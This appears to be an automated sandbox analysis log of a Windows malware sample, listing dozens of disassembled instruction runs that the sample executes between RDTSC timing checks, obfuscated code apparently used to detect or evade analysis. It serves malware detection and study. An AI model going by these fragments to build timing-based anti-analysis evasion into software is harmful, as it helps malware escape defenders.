Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0E54 second address: 51A0EC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov edi, 47407D96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882088h 0x00000016 sbb eax, 498865B8h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 mov esi, 0CA389EFh 0x00000027 popad 0x00000028 mov dword ptr [esp], ebp 0x0000002b jmp 00007FC734882082h 0x00000030 mov ebp, esp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FC734882087h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0EC5 second address: 51A0EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC734E5F785h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F77Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B00BD second address: 51B0171 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC73488207Fh 0x00000009 xor eax, 186A6ABEh 0x0000000f jmp 00007FC734882089h 0x00000014 popfd 0x00000015 mov ax, 1807h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FC734882088h 0x00000024 sub si, 52E8h 0x00000029 jmp 00007FC73488207Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 mov cl, 91h 0x00000032 mov ecx, edx 0x00000034 popad 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FC734882089h 0x00000040 sub ecx, 4FD6A7B6h 0x00000046 jmp 00007FC734882081h 0x0000004b popfd 0x0000004c jmp 00007FC734882080h 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0171 second address: 51B0195 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC734E5F780h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0195 second address: 51B01A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B01A4 second address: 51B01F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC734E5F783h 0x00000014 and al, 0000005Eh 0x00000017 jmp 00007FC734E5F789h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B01F8 second address: 51B020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0611 second address: 51D0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0617 second address: 51D061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D061B second address: 51D061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D061F second address: 51D063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC73488207Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D063A second address: 51D0649 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0649 second address: 51D0700 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC73488207Fh 0x00000009 xor ecx, 3B64683Eh 0x0000000f jmp 00007FC734882089h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FC734882080h 0x0000001b jmp 00007FC734882085h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007FC73488207Eh 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f mov cl, B6h 0x00000031 pushfd 0x00000032 jmp 00007FC734882083h 0x00000037 add ax, 585Eh 0x0000003c jmp 00007FC734882089h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FC73488207Dh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0829 second address: 51D082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D082F second address: 51D0833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0833 second address: 51D08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00BE4014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FC73948E864h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC734E5F789h 0x0000002c adc esi, 63E4B2F6h 0x00000032 jmp 00007FC734E5F781h 0x00000037 popfd 0x00000038 mov dl, al 0x0000003a popad 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov si, 3BFBh 0x00000043 pushfd 0x00000044 jmp 00007FC734E5F780h 0x00000049 sub ax, D348h 0x0000004e jmp 00007FC734E5F77Bh 0x00000053 popfd 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08A1 second address: 51D08A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08A7 second address: 51D08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FC73948E8CFh 0x00000010 mov edi, edi 0x00000012 pushad 0x00000013 call 00007FC734E5F77Dh 0x00000018 pushfd 0x00000019 jmp 00007FC734E5F780h 0x0000001e jmp 00007FC734E5F785h 0x00000023 popfd 0x00000024 pop esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08EC second address: 51D08FA instructions: 0x00000000 rdtsc 0x00000002 mov cl, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bx, ax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D08FA second address: 51D090C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 33129F49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, esi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e mov bh, 85h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D090C second address: 51D0937 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC73488207Ah 0x00000011 sub eax, 490CFCC8h 0x00000017 jmp 00007FC73488207Bh 0x0000001c popfd 0x0000001d mov ebx, esi 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0937 second address: 51D095B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 mov di, 44C2h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC734E5F784h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D095B second address: 51D0973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov edi, 476CC470h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov esi, 2BF98D07h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180052 second address: 5180058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180058 second address: 5180073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, B173h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180073 second address: 51800E6 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC734E5F788h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC734E5F77Bh 0x0000000f popad 0x00000010 and esp, FFFFFFF8h 0x00000013 jmp 00007FC734E5F786h 0x00000018 xchg eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx ebx, si 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub esi, 6A769D38h 0x0000002b jmp 00007FC734E5F77Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51800E6 second address: 5180114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC73488207Ah 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180114 second address: 5180139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734E5F77Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180139 second address: 51801A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734882087h 0x00000008 pushfd 0x00000009 jmp 00007FC734882088h 0x0000000e sub ecx, 666CA6B8h 0x00000014 jmp 00007FC73488207Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e jmp 00007FC734882086h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC73488207Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801A9 second address: 51801AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801AF second address: 51801B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801B3 second address: 51801C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801C2 second address: 51801C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801C6 second address: 51801CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51801CC second address: 5180267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC73488207Ch 0x00000013 sub ah, FFFFFFD8h 0x00000016 jmp 00007FC73488207Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FC734882088h 0x00000022 and ax, B038h 0x00000027 jmp 00007FC73488207Bh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FC734882084h 0x00000036 add esi, 3685AA98h 0x0000003c jmp 00007FC73488207Bh 0x00000041 popfd 0x00000042 push esi 0x00000043 movsx edi, si 0x00000046 pop ecx 0x00000047 popad 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FC73488207Dh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180267 second address: 51802D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007FC734E5F77Ch 0x00000010 call 00007FC734E5F782h 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F782h 0x0000001b jmp 00007FC734E5F785h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51802D0 second address: 51802D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51802D6 second address: 518030D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734E5F786h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F77Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 518030D second address: 5180356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734882086h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 push esi 0x00000013 mov bl, 10h 0x00000015 pop eax 0x00000016 mov bx, ABAAh 0x0000001a popad 0x0000001b je 00007FC7A662034Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FC73488207Ah 0x00000029 pop eax 0x0000002a mov esi, ebx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180356 second address: 51803FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov cx, 042Dh 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F77Ah 0x0000001b sbb eax, 16B83CC8h 0x00000021 jmp 00007FC734E5F77Bh 0x00000026 popfd 0x00000027 popad 0x00000028 je 00007FC7A6BFDA18h 0x0000002e jmp 00007FC734E5F786h 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 jmp 00007FC734E5F780h 0x0000003b or edx, dword ptr [ebp+0Ch] 0x0000003e jmp 00007FC734E5F780h 0x00000043 test edx, 61000000h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FC734E5F77Dh 0x00000052 and ah, FFFFFFF6h 0x00000055 jmp 00007FC734E5F781h 0x0000005a popfd 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51803FA second address: 5180446 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC7A66202E9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882084h 0x00000016 sub ecx, 665FF178h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180446 second address: 5180493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F784h 0x00000009 popad 0x0000000a popad 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007FC734E5F780h 0x00000014 jne 00007FC7A6BFD9A3h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734E5F787h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5180493 second address: 51804AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51804AB second address: 51804AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51706FD second address: 5170711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170711 second address: 517072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC734E5F783h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517072F second address: 5170736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170736 second address: 51707A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FC734E5F787h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC734E5F786h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub ax, AC88h 0x0000002a jmp 00007FC734E5F77Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707A1 second address: 51707C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707C5 second address: 51707CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707CB second address: 51707D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707D1 second address: 51707D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51707D5 second address: 517080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734882084h 0x00000012 jmp 00007FC734882085h 0x00000017 popfd 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517080F second address: 517081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517081D second address: 517084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC734882086h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517084C second address: 5170850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170850 second address: 517086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517086D second address: 517089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517089B second address: 517089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517089F second address: 51708B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708B2 second address: 51708B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51708B7 second address: 51708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FC734E5F787h 0x00000011 sub ebx, ebx 0x00000013 jmp 00007FC734E5F77Fh 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cl, ABh 0x0000001f popad 0x00000020 rdtsc
